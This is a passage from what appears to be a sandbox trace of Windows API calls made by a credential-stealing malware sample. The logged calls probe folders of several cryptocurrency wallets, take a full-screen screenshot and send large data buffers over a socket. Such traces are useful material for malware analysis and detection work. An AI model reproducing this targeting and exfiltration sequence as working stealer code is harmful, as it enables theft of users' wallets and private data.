ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8a8) returned 1 [0281.900] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0281.900] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Binance", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance") returned 0x2b [0281.900] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance", nBufferLength=0x105, lpBuffer=0x43e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance", lpFilePart=0x0) returned 0x2a [0281.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb38) returned 1 [0281.900] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance", nBufferLength=0x105, lpBuffer=0x43e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance", lpFilePart=0x0) returned 0x2a [0281.900] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Binance\\*app-store*", lpFindFileData=0x43e8e8 | out: lpFindFileData=0x43e8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8a8) returned 1 [0281.903] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0281.903] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Coinomi", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi") returned 0x2b [0281.903] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi", nBufferLength=0x105, lpBuffer=0x43e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi", lpFilePart=0x0) returned 0x2a [0281.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb38) returned 1 [0281.903] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi", nBufferLength=0x105, lpBuffer=0x43e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi", lpFilePart=0x0) returned 0x2a [0281.904] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Coinomi\\*", lpFindFileData=0x43e8e8 | out: lpFindFileData=0x43e8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8a8) returned 1 [0281.906] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0281.906] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Electrum\\wallets", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets") returned 0x34 [0281.906] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets", nBufferLength=0x105, lpBuffer=0x43e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets", lpFilePart=0x0) returned 0x33 [0281.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb38) returned 1 [0281.906] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets", nBufferLength=0x105, lpBuffer=0x43e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets", lpFilePart=0x0) returned 0x33 [0281.907] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets\\*", lpFindFileData=0x43e8e8 | out: lpFindFileData=0x43e8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8a8) returned 1 [0281.909] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0281.909] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Ethereum\\wallets", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets") returned 0x34 [0281.909] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets", nBufferLength=0x105, lpBuffer=0x43e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets", lpFilePart=0x0) returned 0x33 [0281.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb38) returned 1 [0281.909] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets", nBufferLength=0x105, lpBuffer=0x43e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets", lpFilePart=0x0) returned 0x33 [0281.910] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\wallets\\*", lpFindFileData=0x43e8e8 | out: lpFindFileData=0x43e8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8a8) returned 1 [0281.912] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0281.912] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Exodus\\exodus.wallet", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet") returned 0x38 [0281.912] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet", nBufferLength=0x105, lpBuffer=0x43e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet", lpFilePart=0x0) returned 0x37 [0281.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb38) returned 1 [0281.912] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet", nBufferLength=0x105, lpBuffer=0x43e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet", lpFilePart=0x0) returned 0x37 [0281.913] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\exodus.wallet\\*", lpFindFileData=0x43e8e8 | out: lpFindFileData=0x43e8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8a8) returned 1 [0281.915] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0281.915] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Exodus", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus") returned 0x2a [0281.915] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus", nBufferLength=0x105, lpBuffer=0x43e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus", lpFilePart=0x0) returned 0x29 [0281.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb38) returned 1 [0281.916] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus", nBufferLength=0x105, lpBuffer=0x43e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus", lpFilePart=0x0) returned 0x29 [0281.916] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Exodus\\*.json", lpFindFileData=0x43e8e8 | out: lpFindFileData=0x43e8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8a8) returned 1 [0281.919] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0281.919] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\Guarda", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda") returned 0x2a [0281.919] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda", nBufferLength=0x105, lpBuffer=0x43e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda", lpFilePart=0x0) returned 0x29 [0281.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb38) returned 1 [0281.967] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda", nBufferLength=0x105, lpBuffer=0x43e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda", lpFilePart=0x0) returned 0x29 [0281.967] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Guarda\\*", lpFindFileData=0x43e8e8 | out: lpFindFileData=0x43e8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8a8) returned 1 [0281.970] ExpandEnvironmentStringsW (in: lpSrc="%appdata%", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0281.970] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\com.liberty.jaxx", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx") returned 0x34 [0281.970] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx", nBufferLength=0x105, lpBuffer=0x43e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx", lpFilePart=0x0) returned 0x33 [0281.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb38) returned 1 [0281.970] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx", nBufferLength=0x105, lpBuffer=0x43e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx", lpFilePart=0x0) returned 0x33 [0281.970] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\com.liberty.jaxx\\*", lpFindFileData=0x43e8e8 | out: lpFindFileData=0x43e8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8a8) returned 1 [0281.972] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.972] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Documents\\Monero\\wallets", lpDst=0x43ea44, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets") returned 0x2c [0281.972] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets", nBufferLength=0x105, lpBuffer=0x43e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets", lpFilePart=0x0) returned 0x2b [0281.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eb38) returned 1 [0281.973] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets", nBufferLength=0x105, lpBuffer=0x43e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets", lpFilePart=0x0) returned 0x2b [0281.973] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Monero\\wallets\\*", lpFindFileData=0x43e8e8 | out: lpFindFileData=0x43e8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8a8) returned 1 [0281.978] CoCreateGuid (in: pguid=0x43e864 | out: pguid=0x43e864*(Data1=0x76a1dc19, Data2=0x8783, Data3=0x4d90, Data4=([0]=0x95, [1]=0xb3, [2]=0xff, [3]=0xb1, [4]=0x2a, [5]=0x5a, [6]=0xc4, [7]=0x2c))) returned 0x0 [0281.978] CoCreateGuid (in: pguid=0x43e7a8 | out: pguid=0x43e7a8*(Data1=0xf83ebd92, Data2=0x13d0, Data3=0x4a2d, Data4=([0]=0xbb, [1]=0xf3, [2]=0xa6, [3]=0xf9, [4]=0xad, [5]=0x95, [6]=0x72, [7]=0x9e))) returned 0x0 [0281.978] send (s=0x264, buf=0x26133ab*, len=162, flags=0) returned 162 [0281.978] recv (in: s=0x264, buf=0x2614658, len=8192, flags=0 | out: buf=0x2614658*) returned 128 [0282.639] GdipCreateFromHWND (hwnd=0x0, graphics=0x43eb24) returned 0x0 [0282.640] GdipGetDC (graphics=0x5332230, hdc=0x43eb34) returned 0x0 [0282.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gdi32", cchWideChar=5, lpMultiByteStr=0x43ead4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gdi32O\x1d", lpUsedDefaultChar=0x0) returned 5 [0282.640] LoadLibraryA (lpLibFileName="gdi32") returned 0x77240000 [0282.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDeviceCaps", cchWideChar=13, lpMultiByteStr=0x43eacc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceCapsQ\x1d", lpUsedDefaultChar=0x0) returned 13 [0282.641] GetProcAddress (hModule=0x77240000, lpProcName="GetDeviceCaps") returned 0x77254de0 [0282.641] GetDeviceCaps (hdc=0x2b0100d1, index=10) returned 900 [0282.641] GetDeviceCaps (hdc=0x2b0100d1, index=117) returned 900 [0282.641] GdipReleaseDC (graphics=0x5332230, hdc=0x2b0100d1) returned 0x0 [0282.641] GdipDeleteGraphics (graphics=0x5332230) returned 0x0 [0283.020] GdipSetPixelOffsetMode (graphics=0x5332730, pixelOffsetMode=0x1) returned 0x0 [0283.020] GdipSetSmoothingMode (graphics=0x5332730, smoothingMode=0x1) returned 0x0 [0283.077] GetDC (hWnd=0x0) returned 0x2f01093b [0283.078] GetCurrentObject (hdc=0x2f01093b, type=0x1) returned 0x1b00017 [0283.078] GetCurrentObject (hdc=0x2f01093b, type=0x2) returned 0x1900010 [0283.078] GetCurrentObject (hdc=0x2f01093b, type=0x7) returned 0x1050032 [0283.078] GetCurrentObject (hdc=0x2f01093b, type=0x6) returned 0x18a002e [0283.078] GdipGetDC (graphics=0x5332730, hdc=0x43ea94) returned 0x0 [0283.282] BitBlt (hdc=0x5201093e, x=0, y=0, cx=1440, cy=900, hdcSrc=0x2f01093b, x1=0, y1=0, rop=0xcc0020) returned 1 [0283.301] GdipReleaseDC (graphics=0x5332730, hdc=0x5201093e) returned 0x0 [0283.311] ReleaseDC (hWnd=0x0, hDC=0x2f01093b) returned 1 [0283.312] GdipDeleteGraphics (graphics=0x5332730) returned 0x0 [0283.328] GdipGetImageEncodersSize (numEncoders=0x43eb1c, size=0x43eb18) returned 0x0 [0283.329] LocalAlloc (uFlags=0x0, uBytes=0x410) returned 0x5aa750 [0283.329] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x5aa750 | out: encoders=0x5aa750) returned 0x0 [0283.335] LocalFree (hMem=0x5aa750) returned 0x0 [0283.348] GdipSaveImageToStream (image=0x5332230, stream=0x4a0030, clsidEncoder=0x43eb2c*(Data1=0x557cf406, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0284.099] CoCreateGuid (in: pguid=0x43e86c | out: pguid=0x43e86c*(Data1=0xf8774dae, Data2=0xbf25, Data3=0x47a8, Data4=([0]=0x9e, [1]=0x44, [2]=0x37, [3]=0xae, [4]=0x5f, [5]=0x5a, [6]=0xf8, [7]=0x45))) returned 0x0 [0284.100] CoCreateGuid (in: pguid=0x43e7b0 | out: pguid=0x43e7b0*(Data1=0xa499ca63, Data2=0xa1e2, Data3=0x4c81, Data4=([0]=0x9d, [1]=0x2e, [2]=0x13, [3]=0xdd, [4]=0xdf, [5]=0x25, [6]=0xb, [7]=0x1f))) returned 0x0 [0284.237] send (s=0x264, buf=0x3cf247e*, len=65536, flags=0) returned 65536 [0284.239] send (s=0x264, buf=0x3d0247e*, len=65536, flags=0) returned 65536 [0284.439] send (s=0x264, buf=0x3d1247e*, len=65536, flags=0) returned 65536 [0284.529] send (s=0x264, buf=0x3d2247e*, len=65536, flags=0) returned 65536 [0284.576] send (s=0x264, buf=0x3d3247e*, len=65536, flags=0) returned 65536 [0284.673] send (s=0x264, buf=0x3d4247e*, len=65536, flags=0) returned 65536 [0284.766] send (s=0x264, buf=0x3d5247e*, len=65536, flags=0) returned 65536 [0284.855] send (s=0x264, buf=0x3d6247e*, len=65536, flags=0) returned 65536 [0284.939] send (s=0x264, buf=0x3d7247e*, len=65536, flags=0) returned 65536 [0285.026] send (s=0x264, buf=0x3d8247e*, len=65536, flags=0) returned 65536 [0285.068] send (s=0x264, buf=0x3d9247e*, len=65536, flags=0) returned 65536 [0285.151] send (s=0x264, buf=0x3da247e*, len=65536, flags=0) returned 65536 [0285.237] send (s=0x264, buf=0x3db247e*, len=65536, flags=0) returned 65536 [0285.329] send (s=0x264, buf=0x3dc247e*, len=65536, flags=0) returned 65536 [0285.373] send (s=0x264, buf=0x3dd247e*, len=65536, flags=0) returned 65536 [0285.455] send (s=0x264, buf=0x3de247e*, len=65536, flags=0) returned 65536 [0285.503] send (s=0x264, buf=0x3df247e*, len=65536, flags=0) returned 65536 [0285.571] send (s=0x264, buf=0x3e0247e*, len=65536, flags=0) returned 65536 [0285.650] send (s=0x264, buf=0x3e1247e*, len=65536, flags=0) returned 65536 [0285.686] send (s=0x264, buf=0x3e2247e*, len=65536, flags=0) returned 65536 [0285.776] send (s=0x264, buf=0x3e3247e*, len=65536, flags=0) returned 65536 [0286.093] send (s=0x264, buf=0x3e4247e*, len=65536, flags=0) returned 65536 [0286.923] send (s=0x264, buf=0x3e5247e*, len=65536, flags=0) returned 65536 [0287.065] send (s=0x264, buf=0x3e6247e*, len=65536, flags=0) returned 65536 [0287.530] send (s=0x264, buf=0x3e7247e*, len=65536, flags=0) returned 65536 [0287.656] send (s=0x264, buf=0x3e8247e*, len=65536, flags=0) returned 65536 [0288.336] send (s=0x264, buf=0x3e9247e*, len=65536, flags=0) Thread: id = 160 os_tid = 0xfd4 Thread: id = 161 os_tid = 0xfd8 [0247.778] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0281.615] CoGetContextToken (in: pToken=0x107f634 | out: pToken=0x107f634) returned 0x0 [0281.615] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.615] WbemLocator:IUnknown:Release (This=0x56e9ec0) returned 0x1 [0281.615] WbemLocator:IUnknown:Release (This=0x56e9ec0) returned 0x0 [0281.615] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.615] IUnknown:Release (This=0x5947a8) returned 0x2 [0281.615] IUnknown:Release (This=0x5947a8) returned 0x1 [0281.615] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.615] WbemLocator:IUnknown:Release (This=0x596d48) returned 0x1 [0281.615] WbemLocator:IUnknown:Release (This=0x596d48) returned 0x0 [0281.615] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.615] IUnknown:Release (This=0x594ad8) returned 0x2 [0281.615] IUnknown:Release (This=0x594ad8) returned 0x1 [0281.615] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.615] IUnknown:Release (This=0x594e08) returned 0x2 [0281.615] IUnknown:Release (This=0x594e08) returned 0x1 [0281.615] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.615] IUnknown:Release (This=0x594fa0) returned 0x2 [0281.615] IUnknown:Release (This=0x594fa0) returned 0x1 [0281.616] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.616] IUnknown:Release (This=0x595138) returned 0x2 [0281.616] IUnknown:Release (This=0x595138) returned 0x1 [0281.616] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.616] IUnknown:Release (This=0x5952d0) returned 0x2 [0281.616] IUnknown:Release (This=0x5952d0) returned 0x1 [0281.616] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.616] IUnknown:Release (This=0x595468) returned 0x2 [0281.616] IUnknown:Release (This=0x595468) returned 0x1 [0281.616] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.616] IUnknown:Release (This=0x595600) returned 0x2 [0281.616] IUnknown:Release (This=0x595600) returned 0x1 [0281.616] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.616] IUnknown:Release (This=0x595798) returned 0x2 [0281.616] IUnknown:Release (This=0x595798) returned 0x1 [0281.616] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.616] IUnknown:Release (This=0x595930) returned 0x2 [0281.616] IUnknown:Release (This=0x595930) returned 0x1 [0281.616] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.616] IUnknown:Release (This=0x595ac8) returned 0x2 [0281.616] IUnknown:Release (This=0x595ac8) returned 0x1 [0281.616] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.616] IUnknown:Release (This=0x595c60) returned 0x2 [0281.616] IUnknown:Release (This=0x595c60) returned 0x1 [0281.616] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.616] IUnknown:Release (This=0x595df8) returned 0x2 [0281.616] IUnknown:Release (This=0x595df8) returned 0x1 [0281.616] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.616] IUnknown:Release (This=0x595f90) returned 0x2 [0281.616] IUnknown:Release (This=0x595f90) returned 0x1 [0281.617] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.617] IUnknown:Release (This=0x596128) returned 0x2 [0281.617] IUnknown:Release (This=0x596128) returned 0x1 [0281.617] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.617] IUnknown:Release (This=0x5962c0) returned 0x2 [0281.617] IUnknown:Release (This=0x5962c0) returned 0x1 [0281.617] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.617] IUnknown:Release (This=0x596458) returned 0x2 [0281.617] IUnknown:Release (This=0x596458) returned 0x1 [0281.617] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.617] IUnknown:Release (This=0x5965f0) returned 0x2 [0281.617] IUnknown:Release (This=0x5965f0) returned 0x1 [0281.617] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.617] IUnknown:Release (This=0x5703680) returned 0x2 [0281.617] IUnknown:Release (This=0x5703680) returned 0x1 [0281.617] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.617] IUnknown:Release (This=0x5703818) returned 0x2 [0281.617] IUnknown:Release (This=0x5703818) returned 0x1 [0281.617] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 [0281.617] IUnknown:Release (This=0x57039b0) returned 0x2 [0281.617] IUnknown:Release (This=0x57039b0) returned 0x1 [0281.617] CoGetContextToken (in: pToken=0x107f5b8 | out: pToken=0x107f5b8) returned 0x0 